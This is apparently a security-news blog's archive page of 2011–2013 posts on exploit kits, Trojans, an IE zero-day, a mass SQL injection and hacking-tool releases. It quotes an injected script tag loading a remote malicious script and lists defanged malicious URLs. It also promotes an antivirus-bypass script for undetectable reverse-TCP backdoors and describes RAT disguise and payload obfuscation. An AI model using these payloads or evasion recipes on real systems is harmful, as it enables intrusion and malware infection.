Showing posts sorted by date for query payload. Sort by relevance Show all posts
Showing posts sorted by date for query payload. Sort by relevance Show all posts

TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit

Posted by Avik Sarkar On 12/05/2013 02:35:00 am

TeamSpeak Official Forum Hacked! Infecting Users By Malicious DotCache Exploit Kit
A serious security breach has compromised official forum of TeamSpeak, according to sources hackers have gained access inside the server and injected malicious script into the landing page of TeamSpeak official forum. Expert malware analyzer have figured out that the attack was thoroughly planned in order to infect millions of users while redirecting them to a DotCache exploit kit landing page as illustrated below 
TeamSpeak is a very famous Brazilian company who offers (VoIP) software that allows computer users to speak on a chat channel with fellow computer users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice, from there they can join chat channels and enjoy the excellent VoIP service. Mostly it is used by millions of gamers across the globe. 
Basically we can consider TeamSpeak is a high value target, so did the hacker. Researchers said that the exploit kit landing page is hosted on atvisti.ro, a forum for ATV enthusiasts that's also been compromised. In a statement well known malware analyst & security researcher Jerome Segura said- if the Java exploit succeeds the final payload is loaded. In this particular example, the payload was the Zero Access Trojan which an Anti-Malware from Malwarebytes detects as Rootkit.0Access. The matter of a bit relief is that the malware has not yet been spotted in the wild. According to a statistic by Virus Total, only 7 of 46 leading antivirus can detect this type of malware. Exactly like TeamSpeak, a few days earlier Kahu Security researchers uncovered a similar compromise on the forum for the Nissan Pathfinder Off Road Association (NPORA) in both cases, JJEncode was used to obfuscate the malicious script. To avoid further infection, TeamSpeak forum has already been informed, an as expected they have over come this issue. For detail analysis of the above said malware you can visit official blog post of Malwarebytes



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Social-Engineer Toolkit (SET) Version 4.0 Codenamed “Balls of Steel” Released

Posted by Avik Sarkar On 9/23/2012 12:05:00 am

Social-Engineer Toolkit (SET) Version 4.0 Codenamed “Balls of Steel” Released


Social Engineer Toolkit also known as SET gets another update. Now we have Social Engineer Toolkit version 4.0 codename “Balls of Steel” is officially available for public consumption. In his official blog; Trusted Sec, the developper of SET has claimed that this version of SET is the most advanced toolkit till today. This version is the collection of several months of development and over 50 new features and a number of enhancements, improvements, rewrites, and bug fixes
Lets talk about some highlights and the new major features of SET 4.0- the Java Applet attack has been completely rewritten and obfuscated with added evasion techniques. All of the payloads have been heavily encrypted with a number of heavy anti-debugging tools put in place. PyInjector is now available on the Java Applet attack natively and deploys shellcode automatically through a byte compiled executable. The powershell attack vectors now support customized payload selection through the config/set_config. A new attack vector has been added called the Dell DRAC Attack Vector (default credential finder). A new teensy payload has been added from the Offensive-Security crew – the auto-correcting attack vector with DIP switch and SDcard “Peensy”. The web cloner has been completely rewritten in native python removing the dependency for wget. The new IE zero day has been included in the Metasploit Web Attack Vector. The Java Repeater and Java Redirection has been rewritten to be more reliable. Obfuscation added to randomized droppers including OSX and Linux payloads.

Full Changelog of The Social-Engineer Toolkit (SET) 4.0:- 

  •  Added a new attack vector to SET called the Dell Drac attack vector under the Fast-Track menu.
  •  Optimized the new attack vector into SET with standard core libraries
  •  Added the source code for pyinjector to the set payloads
  •  Added an optimized and obfuscated binary for pyinjector to the set payloads
  •  Restructured menu systems to support new pyinjector payload for Java Applet Attack
  •  Added new option to SET Java Applet – PyInjector – injects shellcode straight into memory through a byte compiled python executable. Does not require python to be installed on victim
  •  Added base64 encoded to the parameters passed in shellcodexec and pyInjector
  •  Added base64 decode routine in Java Applet using sun.misc.BASE64Decoder – native base64 decoding in Java is the suck
  •  Java Applet redirect has been fixed – was a bug in how dynamic config files were changed
  •  Fixed the UNC embed to work when the flag is set properly in the config file
  •  Fixed the Java Repeater which would not work even if toggled on within the config file
  •  Fixed an operand error when selecting high payloads, it would cause a non harmful error and an additional delay when selecting certain payloads in Java Applet
  •  Added anti-debugging protection to pyinjector
  •  Added anti-debugging protection to SET interactive shell
  •  Added anti-debugging protection to Shellcodeexec
  •  Added virtual entry points and virtualized PE files to pyinjector
  •  Added virtual entry points and virtualized PE files to SET interactive shell
  •  Added virtual entry points and virtualized PE files to Shellcodeexec
  •  Added better obfsucation per generation on SET interactive shell and pyinjector
  •  Redesigned Java Applet which adds heavily obfsucated methods for deploying
  •  Removed Java Applet source code from being public – since redesign of applet, there are techniques used to obfuscate each time that are dynamic, better shelf life for applet
  •  Added a new config option to allow you to select the payloads for the powershell injection attack. By specifying the config options allows you to customize what payload gets delivered via the powershell shellcode injection attack
  •  Added double base64 encoding to make it more fun and better obfuscation per generation
  •  Added update_config() each time SET is loaded, will ensure that all of the updates are always present and in place when launching the toolkit
  •  Rewrote large portions of the Java Applet to be dynamic in nature and place a number of non descriptive things into place
  •  Added better stability to the Java Applet attack, note that the delay between execution is a couple seconds based on the obfuscation techniques in place
  •  Completely obfsucated the MAC and Linux binaries and generate a random name each time for deployment
  •  Fixed a bug that would cause custom imported executables to not always import correctly
  •  Fixed a bug that would cause a number above 16 to throw an invalid options error
  •  Added better cleanup routines for when SET starts to remove old cached information and files
  •  Fixed a bug that caused issues when deploy binaries was turned to off, would cause iterative loop for powershell and crash IE
  •  Centralized more routines into set.options – this will be where all configuration options reside eventually
  •  Added better stability when the Java Applet Repeater is loaded, the page will load properly then execute the applet.
  •  The site cloner has been completely redesigned to use urllib2 instead of wget, long time coming
  •  The cloner file has been cleaned up from a code perspective and efficiency
  •  Added better request handling with the new urllib2 modules for the website cloning
  •  Added user agent string configuration within the SET config and the new urllib2 fetching method
  •  Added a pause when generating Teensy payloads
  •  Added the Offensive-Security “Peensy” multi-attack vector for the Teensy attacks
  •  Added the Microsoft Internet Explorer execCommand Use-After-Free Vulnerability from Metasploit into the Metasploit Browser Exploits Attack vectors
  •  Fixed a bug in cleanup_routine that would cause the metasploit browser exploits to not function properly
  •  Fixed a bug that caused the X10 sniffer and jammer to throw an exceptions if the folder already existed



To Download The Social-Engineer Toolkit (SET) 4.0 Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Issues 'fix it' To Close Internet Explorer 0-day Vulnerability

Posted by Avik Sarkar On 9/20/2012 05:40:00 pm

Microsoft Issues 'fix it' To Close Internet Explorer 0-day Vulnerability 

Last few days the whole cyber world have gone through with so many drama of Internet Explorer's security bug, as researchers have unveiled four active exploits of a zero-day vulnerability in the browser. As expected the software giant Microsoft has released an emergency fix to get rid of these major security issues. Microsoft released a “fix it” tool for a critical security flaw in most versions of Internet Explorer 6, 7, 8 and 9  that hackers have been exploiting to break into Windows systems. The company said it expects to issue an official patch (MS12-063) for the vulnerability on Friday, Sept. 21. "While we have only seen a few attempts to exploit this issue, impacting an extremely limited number of people, we are taking this proactive step to help ensure Internet Explorer customers are protected and able to safely browse online," said Yunsun Wee, director of Microsoft Trustworthy Computing in a statement. The zero-day in IE 6-9 is a use-after-free memory corruption vulnerability, similar to a buffer overflow, that would enable an attacker to remotely execute code on a compromised machine. The original exploit payload dropped the PoisonIvy remote access Trojan (RAT) via a corrupted Flash movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie, Blasco said. He also said the new exploits are the work of the Chinese hacker group Nitro, the same group behind a pair of Java zero-day exploits disclosed in August.

Blasco also said the new exploits appear to be targeting defense contractors in the United States and India.
Microsoft recommended several workarounds Tuesday morning before announcing its intention to send out a FixIt.
  • Setting Internet and local Internet security zone settings to high, which would block ActiveX Controls and Active Scripting in both zones
  • Configure IE to prompt the user before running Active Scripting, or disable Active Scripting in both zones
  • Use of Microsoft's Enhanced Mitigation Experience Toolkit provides mitigations as well, and would not impact website usability, as both of the first two options might.
Microsoft also said that IE running on Windows Server 2003, 2008 and 2008R2 runs in a restricted mode that mitigates the vulnerability. Outlook, Outlook Express and Windows Mail also open HTML messages in a restricted zone, mitigating the vulnerabilty but should a user click a link in a message, they could still be vulnerable to exploit.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

BlackHole Exploit Kit 2.0 Released !! (Collection of Latest Exploit Modules)

Posted by Avik Sarkar On 9/15/2012 03:47:00 pm

BlackHole Exploit Kit 2.0 Released !! (Collection of Latest Exploit Modules)

BlackHole exploit kit - which is so far recognized as the most successful exploit kit that includes a collection of exploits to take advantage of vulnerability in the target's machine to download malwares & infect the victim, now became more power full as The BH developers have unleashed a new version of their exploit toolkit on the net. With BlackHole 2.0, the software has been "rewritten from scratch" to fool antivirus & firewall, said the unknown developers in a Russian-language release announcement on Pastebin. In their posting, they advertise new features such as temporary exploit URLs that are only valid for a few seconds, making them harder to analyse. The other features are also quite worthy and makes it a quite faster exploit kit like the new version doesn’t rely on plugindetect to determine the Java version installed. This will speed up the malware download routine. As the link to the malicious payload was easily identified by security software earlier, the BlackHole 2.0 comes with a feature that allows the customer to choose the link. The creators of the exploit kit claim that this way none of the commercial antivirus solutions is able to detect it. Old exploits that were causing the browser to crash have been removed. 
A total of 16 improvements have been claimed to be done in BlackHole’s administrator panel. Now it’s faster, statistics are easier to view, and mobile phones and Windows 8 have been added to allow customers to see precisely what types of devices are infected. The price for the services are quite comparative. All you need is criminal intent and money. The toolkit can now even be rented for a $50 a day and will then run on a server that is owned by the BlackHole team. The annual licence fee for criminals who use their own servers is $1,500. Detailed information about BH 2.0 can be here





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

'BackDoor.Wirenet.1' Trojan Stealing Passwords From Mac & Linux Based Systems

Posted by Avik Sarkar On 9/04/2012 03:34:00 pm


'BackDoor.Wirenet.1' Trojan Stealing  Passwords From Mac & Linux Based Systems

A Russian Anti Virus software company named 'Dr Web' has spotted a piece of malware that unusually targeting Macs and Linux-based systems is causing a world of trouble for those in its path. The newly found mlaware dubbed 'BackDoor.Wirenet.1' apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like Chrome, Chromium, Firefox and Opera. Furthermore, it’s also able to obtain passwords from popular applications including SeaMonkey, Pidgin and Thunderbird. Even if you don’t use any of the above mentioned software, you’re still in danger as a keylogger is bundled in the payload. Wirenet.1 installs itself into the user's home directory using the name WIFIADAPT

There are some steps that can be taken right away if you think you could be infected. Dr. Web is quick to point out that their anti-virus software will keep you protected. Another option is to simply disable communication with the control server used by the code’s author. In this case, blocking communication with IP address 212.7.208.65 should do the trick.  

Earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten"targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal information




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

BackTrack 5 R3 Released & Available To Download

Posted by Avik Sarkar On 8/14/2012 02:44:00 am

BackTrack 5 R3 Released & Available To Download!!

In our last post about BackTrack we mention the release date of long awaited BT 5 Release 3. So finally the countdown is over. The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released world wide. First BT5 R3 preview was released  in BlackHat 2012 Las Vegas for the enjoyment of conference attendees. The main aim of that pre-release was to figure out their last bug reports and tool suggestions from the BH / Defcon crowds. This final release mainly focuses on bug-fixes as well as the addition of over 60 new tool. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
As usual KDE and GNOME, 32/64 bit ISOs, have been released a single VMware Image (Gnome, 32 bit). 
We would also like to give to reminder that the first release candidate (R1) of BackTrack 5 was released in August last year. Later in March this year we got the second release candidate (R2) of BT 5. 
For those requiring other VM flavors of BackTrack If you want to build your own VMWare image then instructions can be found in the BackTrack Wiki. Direct ISO downloads will be available once all our HTTP mirrors have synched. But still you can download BackTrack 5 R3 via torrent from the below links. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Duqu Mystery Finally Solved By Researcher at Kaspersky Lab

Posted by Avik Sarkar On 3/21/2012 04:26:00 am

Duqu Mystery Finally Solved By Researcher at Kaspersky Lab

After so many drama finally the deep mystery of DUQU solved. Researcher at kaspersky lab has found out that this dangerous stuxnet was written by custom object oriented C called “OO C”. The mystery began earlier this month, when Kaspersky researchers struggled to determine what programming language had been used to develop the Duqu. So the researchers have taken the help of programming community to find out the truth. They got a wild feed back, 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used for generating the Duqu Framework code. 
Let us review the most popular suggestions:-
  • Variants of LISP
  • Forth
  • Erlang
  • Google Go
  • Delphi
  • OO C
  • Old compilers for C++ and other languages
There are two main possibilities. The code was either written using a custom OO C framework, or it was entirely written in OO C manually, without any language extensions.No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers was pointed out by Kaspersky’s Igor Soumenkov.“This kind of programming is more commonly found in complex ‘civil’ software projects, rather than contemporary malware. Additionally, the whole event-driven architecture must have been developed as a part of the Duqu code or its OOC extension.” said Mr Igor
This made an assumption that the developers are old school and don’t trust C++. That’s why they relied on C. Another reason for using OO C is because back in the good old days it was more portable than C++. Duqu was created by a professional team that wrote the framework based on old code. To know the full story click here.


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Armitage (Cyber Attack Management Tool For Metasploit) Ver 01.19.12 Released

Posted by Avik Sarkar On 1/23/2012 12:02:00 am

Armitage Ver 01.19.12 Released!!!


Earlier  couple of time we have discussed about Armitage. It is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you are new in Metasploit adn want to learn its advanced features then Armitage can only help you. Now, the author has released an updated version – Armitage version 01.19.12!

Official Change Log For Armitage 01.19.12:- 

  • Data export now includes a sessions file. This lists all of the Metasploit sessions you had in your database. There’s some neat data here including which exploit was used, which payload, start time, and close time. You can calculate how much time you spent on your client’s boxes. Cool stuff.
  • Fixed a potential dead-lock caused by mouse enter/exit events firing code that required a lock. Nice landmine to defuse.
  • Fixed a weird condition with d-server detection. Sometimes (rarely) Armitage wouldn’t detect the d-server even when it’s present.
  • Added check to d-server allowing one lock per/client. Client won’t reobtain a lock until it lets it go. This prevents you from opening two shell tabs for a shell session in team mode.
  • Fixed an infinite loop condition when some Windows shell commands would return output with no newlines (e.g., net stop [some service]). Thanks Jesse for pointing me to this one.
  • Data export now includes a timeline file. This file documents all of the major engagement events seen by Armitage. Included with each of these events is the source ip of the attack system and the user who carried out the action (when teaming is setup).
  • Data export now exports timestamps with current timezone (not GMT)
  • Fixed a nasty bug that’s been with Armitage since the beginning! I wasn’t freeing edges properly in the graph view. If you had pivots setup in graph view and used Armitage long enough–eventually Armitage would slow down until the program became unusable. At least it’s fixed now.
  • Adjusted the d-server state identity hash combination algorithm to better avoid collissions.
  • Armitage now displays ‘shell session’ below a host if the host info is just the Windows shell banner. 

The latest Armitage is installed with Metasploit 4.1.0+. If you want to use Armitage as a remote Metasploit client Then Click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Patator -A Multi-Purpose Brute-Forcer

Posted by Avik Sarkar On 1/17/2012 06:42:00 pm


Earlier we have several times talked about Brute forcer tool like THC-Hydra, Cain & Abel, Rainbow Crack and many more. Today we will discuss about Patator is a multi-purpose brute-forcer, written in pyton language, with a modular design and a flexible usage. Can be modified and rewritten as per our environment requirement. Patator is licensed GPLv2.

Modules Supported:-
ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass: Brute-force the password of Java keystore files

Features of Patator:-
  • No false negatives, as it is the user that decides what results to ignore based on:
  • status code of response
  • size of response
  • matching string or regex in response data
  • Modular design
  • not limited to network modules (eg. the unzip_pass module)
  • not limited to brute-forcing (eg. remote exploit testing, or vulnerable version probing)
  • Interactive runtime
  • show verbose progress
  • pause/unpause execution
  • increase/decrease verbosity
  • add new actions & conditions during runtime in order to exclude more types of response from showing
  • Use persistent connections (ie. will test several passwords until the server disconnects)
  • Multi-threaded
  • Flexible user input
  • Any part of a payload is fuzzable:
  • use FILE[0-9] keywords to iterate on a file
  • use COMBO[0-9] keywords to iterate on the combo entries of a file
  • use NET[0-9] keywords to iterate on every host of a network subnet

To Download Patator Click Here 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Your Car At Risk, Hackers Can Attack Modern Cars Remotely

Posted by Avik Sarkar On 12/16/2011 01:33:00 pm


Hackers could attack modern cars without even touching them, as new car models roll off the line loaded with complex IT systems running millions of lines of software code, it's become evident that hacking a car to gain external control of it is possible. While actual cases in the field are rare, the industry is moving to secure its systems and prevent cars from becoming a major target said by Brian Jackson a security researcher. In the exclusive report he said: An unsuspecting driver opens her door and steps into her new car, placing her smartphone on the dash as it connects with the in-car infotainment system for hands-free features. Little does she know there's a Trojan virus on her phone just waiting to be connected to a car – and it executes malicious code on the vehicle's embedded software. Suddenly a hacker has the ability to track her car, unlock the doors, or even control the climate controls and speaker volume.
It sounds like a scene out of the next James Bond film, but the above scenario could be a reality today. As auto makers look to woo consumers with snazzy in-car technology features, they are also opening up personal vehicles to the underground community of hackers that have long targeted computer users. In-car IT systems such as Ford's Sync or General Motor's OnStar could be opening up exploits that allow hackers to take control of your car without even laying hands on it.
While complex in-car IT systems are so new that actual car hacking cases in the field are virtually non-existent, researchers have demonstrated it's possible. But investigations into car hacking by police may be impossible at this point because of a lack of forensics capability to detect malware. All the more reason for security vendors like McAfee, now a division of Intel Corp., to push car manufacturers to pay serious attention to security.
“It shouldn't be the responsibility of the consumers to have to secure these systems,” says Tim Fulkerson, senior director of marketing at McAfee embedded security group. “Just as manufacturers have built in seat belts and air bags, now that they're moving to software innovation, they need to bring software security into these vehicles.”
Best known for its PC antivirus software, McAfee is now working with car makers to build secure enough systems that consumers won't end up buying virus scan software for their ride. When it comes to car makers and securing IT system, Fulkerson says it “is certainly not their area of expertise.”
Perhaps that's why a team of car-hacking researchers from the University of Washington and the University of California at San Diego have had so much success. Dubbed the Center for Automotive Embedded Systems Security (CAESS), the team demonstrated in May 2010 how a criminal with physical access to a car could implant malware. Then in August 2011, the team showed an external car hacking attack could be mounted through various paths including Bluetooth and cellular radio.
One such attack was executed after the researchers reverse-engineered a car's telematics operating system and found the program responsible for handling Bluetooth functions. From there, they planted a Trojan horse (a piece of malicious software) on an HTC Dream smartphone that monitors for new Bluetooth connections and if it finds a telematics unit, sends the payload.
Researchers were also able to use special hardware to “sniff” the MAC address of the Bluetooth connection needed for pairing new devices with the telematics unit. After cracking the password through brute force, or machine-assisted repeat attempts, the Trojan could be uploaded from a device in the attacker's hands.
But seeing such an attack executed in the wild today is unlikely, according to Patrick Neal, a program coordinator for crime and intelligence analysis at the B.C. Institute of Technology (BCIT). He had his students explore car hacking methods identified by the CAESS group and others. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Script To Bypass Antivirus & Firewall By Security Labs

Posted by Avik Sarkar On 12/15/2011 10:26:00 am



Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. In order to compile the generated payload Mingw32 gcc must be installed on your system. 

Method:-
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

After the installation you need to move the shell-script (Vanish.sh, We have mentioned the download link below) to default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14.
Note: By default Script Generates Reverse TCP Payload but you can change it some modifications in Script [vanish.sh]. Virus Scan Report of Backdoor shows that its almost undetectable by most of the Antivirus programs.

To Download The Script Click Here

Security Labs Experts also released a pastebin. Rest of other information can be found from that release. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SQL Injection Vulnerability, More Than 4000 Websites Under Risk

Posted by VOICE OF GREYHAT On 12/09/2011 03:55:00 pm


Based on search engine (Mainly Google) quarries also known as dorks a mass SQL-i attack is performing. The output is showing that more than 4,000 websites have been infected in this vulnerability. First when it was detected then the list of infected websites ware small, later it increases. As per report SANS more than thousands sites already been compromised in this attack.

Here is a demo:- 
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>
Typically it is inserted into several tables.  

From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. Impacted sites appear to be running Microsoft Internet Information Services (IIS) or Microsoft SQL web servers, and are using software from ASP.NET or ColdFusion. Visitors to hacked sites, which are vulnerable because they haven't fully patched their applications and the databases that support them, are being redirected to pages trying to push rogue anti-virus programs or another payload.
"The hex will show in the IIS log files, so monitor those," Hofman wrote. "Make sure that applications only have the access they require, so if the page does not need to update a (database), then use an account that can only read." Later said by SANS handler Mark Hofman



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

0-Day Vulnerability in Yahoo Messenger, An Attacker Can Change The Status Update Remotely

Posted by Avik Sarkar On 12/04/2011 04:41:00 pm


Zero day exploit found in Yahoo messenger allowing attackers to change the status update remotely. Version 11.x of the Messenger client (including the freshly-released 11.5.0.152-us) is infected with this 0day vulnerability. The status message change occurs when an attacker simulates sending a file to a user. This action manipulates the $InlineAction parameter (responsible for the way the Messenger form displays the accept or deny the transfer) in order to load an iFrame which, when loaded, swaps the status message for the attacker's custom text. This status may also include a dubious link. This iFrame is sent as a regular message and comes from another Yahoo Instant Messenger user, even if the user is not in the victim’s contact list. The exploit delivers its payload when the attacker simulates sending a file to the user. The bogus file tricks Messenger into loading an iFrame that then swaps the status message for whatever garbage the attacker wants to load, including a potentially "dubious" link, as Bitdefender describes it. The iFrame comes over as a regular message from another Yahoo Instant Messenger user, even if the user isn't in the victim's contact list.

  • Why it is so dangerous? 
Status messages are highly efficient in terms of click-through rate, as they address a small group of friends. Chances are that, once displayed, they will be clicked by most contacts who see them. One scenario: the victim's status message is swapped with an attention-getting text that points to a page hosting a zero-day exploit targeting the IE browser, the locally installed Java or Flash environments or even a PDF bug, to mention only a few. Whenever a contact clicks on the victim’s status message, chances are they get infected without even knowing it. All this time, the victim is unaware that their status message has been hijacked.
Another lucrative approach to changed status messages is affiliate marketing (ie: sites that pay affiliates for visits or purchases through a custom link). Someone can easily set up an affiliate account, generate custom links for products in campaign, then massively target vulnerable YIM victims to change their status with the affiliate link. Then, they just wait for the contact-generated traffic to kick in. There are actually a couple of services that pay YIM users to change their status with custom links as part of their business.


  • Who is Safe?
You are running a Bitdefender security solution (Bitdefender Antivirus Plus, Bitdefender Internet Security or Bitdefender Total Security). We detect this threat via the HTTP scanner and block it before it reaches the Messenger application.
You have Yahoo Messenger set to “ignore anyone who is not in your Yahoo! Contacts“(which is off by default).


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Social Engineer Toolkit (SET) Version 2.4.2 Released

Posted by Avik Sarkar On 12/01/2011 06:07:00 pm



Social Engineer Toolkit has been updated! We now have the Social Engineer Toolkit version 2.4.2

Brief About SET:-
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Official Change Log For Social Engineer Toolkit v2.4.2:-


  • Fixed a bug in multiattack vector where specifying java applet attack and shellcode exec would not properly inject alphanumeric shellcode into applet properly
  • Restructured multiattack vector to properly clone, prep payload delivery, then inject alphanumeric shellcode
  • Added better handling around multiple attack vectors
  • Fixed a bug that caused msfvenom to bomb out if path was /opt/framework3/msf3 versus /opt/framework/msf3
  • Added better handling around multiattack in Social Engineer Toolkit
  • Fixed a bug with self signed certificates would continue to show Microsoft versus what you sign it with
  • Changed java applet to load and render at bottom of body versus in head. Page should now load with Java Applet appearing
  • Fixed a bug where Java Repeater would not load properly when executed due to a incorrect loop within cloner.py
  • Added the ability to use filename for import versus directory
  • Added the ability to import index.html files versus just the folder on the custom import feature


To Download Social Engineer Toolkit v2.4.2 Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Son of Flynn (Social Engineer Toolkit v2.2) Released

Posted by Avik Sarkar On 10/28/2011 06:35:00 pm



Social Engineer Toolkit has been updated! This release is named “Son of Flynn”. We now have the Social Engineer Toolkit version 2.2. The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official Change Log for Social Engineer Toolkit v2.2:-
* Added better handling when generating your own legitimate certifcate and ensure proper import into SET
* Adjusted java repeater time to have a little more delay, seems to be more reliable and stable if that occurs.
* Removed the check from the main launch of SET for pymssql and only added it when the fast-track menu was specified
* Removed the derbycon posting since it already happened. When we get closer I’ll re-add it back in with detailed information
* Removed old files in the java applet attack that were not needed.
* Added better granularity checking the Java Applet attack when the shellcode exec or normal attacks were being specified.
* Fixed a bug that caused infectious media bomb out if shellcodeexec was specified as a payload
* Added a legal disclaimer for first inital use of SET that is must be used for lawful purposes only and never malicious intent
* Added improved stability of the java applet attack through better payload detect/selection
* Fixed a bug with shellcodeexec and creating a payload and listener through SET, it would throw an exception, it now exports shellcodeexec properly and exports alphanumeric shellcode
* Added new config check inside core.py, will return value of config, easier..will gradually replace all config checks with this
* Fixed an issue that would cause AUTO_REDIRECT=OFF to still continue to redirect. This was caused from a rewrite of teh applet and the same parameters not being filtered properly
* Added more customizing Options to RATTE. Now you can specifiy custom filename ratte uses for evading local firewalls. So you can deploy RATTE as readme.pdf.exe and it will run as iexplore.exe to bypass local firewalls. You can although specify if RATTE should be persistent or not. For testing network firewalls you won’t need a persistent one. Doing a penetration test you may choose a persistent configuration.
* Fixed a bug in RATTE which could break connection to Server. RATTE now runs much more stable and can bypass high end network firewalls much more reliable.
* Added a new config option called POWERSHELL_INJECTION, this uses the technique discovered by Matthew Graeber which injects shellcode directly into memory through powershell
* Added a new teensy powershell attack leveraging Matthew Graebers attack vector.
* Rehauled the Java Applet attack to incorporate the powershell injectiont technique, its still experimental, so will remain OFF in the config by default. The applet will not detect if Powershell is installed, and if so, use the shellcode deployment method to gain memory execution without touching disk through PowerShell.
* Fixed a bug that would cause mssql bruter to error if powershell injection was enabled or other attack vectors

To Download SET 2.2 Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Flashback Trojan Targeting Mac OS X in VMware Fusion

Posted by Avik Sarkar On 10/18/2011 05:48:00 pm

Underscoring the growing sophistication of Mac-based malware, a trojan preying on OS X users has adopted several stealth techniques since it was discovered last month.
Updates to the Flashback trojan, which gets installed by disguising itself as an Adobe Flash update, now prevent the malware from running on Macs that use VMware Fusion. Such virtual machine software is routinely used by security researchers to test the behavior of a malware sample because it's easier to delete a virtual instance when they're finished than it is to wipe the hard drive clean and reinstall the operating system.
According to MAC Security Blog:-
The latest version, Flashback.D, has gotten a bit sneakier. First, it checks to see if the user is running Mac OS X in VMware Fusion. If so, it does not execute. It does this because many malware researchers test malware in virtual machines, rather than infect full installations, as it is easier to delete them and start over with clean copies. This means that security researchers analyzing and looking for this malware need to be running regular Macs.
Next, the installer for the malware downloads the payload when running the postinstall script.

Finally, it no longer installs the easy-to-spot ~/Library/Preferences/Preferences.dylib. Instead, it installs the backdoor inside Safari, and does so in two ways. It adds information to Safari’s info.plist file, with the location of the backdoor, and it adds the actual backdoor module at /Applications/Safari.app/Contents/Resources/UnHackMeBuild.


Even if a user removes the above file (UnHackMeBuild), they need to edit Safari’s info.plist file; if not, Safari will look for the backdoor on launch, and, if it is not found, Safari will quit.

-News Source (Intego Blog, The Register)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Steve Jobs: Not Dead Yet! Emails Lead to Malware

Posted by Avik Sarkar On 10/13/2011 07:45:00 pm


We all are aware of that Mr. Steve Jobs death. But this phenomena has beeing misused by cyber criminals. Previously we have seen Facebook scam happened after the death of a public figure, a scam was started on Facebook Thursday to exploit the death of Steve Jobs. Claiming that free iPads were being given away in “in memory of Steve,” the Facebook page was quickly taken down after the media began to report on it.
But it not yet over Security researchers from M86 Labs have intercepted a currently spreading malware campaign a Steve Jobs spam campaign, with the subject suggesting that he is still alive. 

Steve Jobs Alive!
Steve Jobs Not Dead!
Steve Jobs: Not Dead Yet!
Is Steve Jobs Really Dead?


The URL links in the spam are many and varied. The websites that they point to all look to be hacked by the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a BlackHole exploit kit landing page.


The intermediary redirect URLs are random-looking domains, with a top level domain of .ms (Monserrat in case you didn’t know), here are some examples:
hxxp://xnyiinobfb[dot]ce[dot]ms/index.php
hxxp://derhvbq[dot]ce[dot]ms/index.php
The purpose of the exploit kit is to try and exploit vulnerabilities on the system and eventually download malicious executable files. At this stage, we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.
Unfortunately, many people may find this spam campaign “click-worthy” given the icon that Steve Jobs was. The usual advice applies – avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.

-News Source (M86lab)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Stealthy Keylogger Malware Infected U.S. Drone Fleet & Gained Remote Access on Their Flying Missions

Posted by Avik Sarkar On 10/10/2011 05:45:00 pm



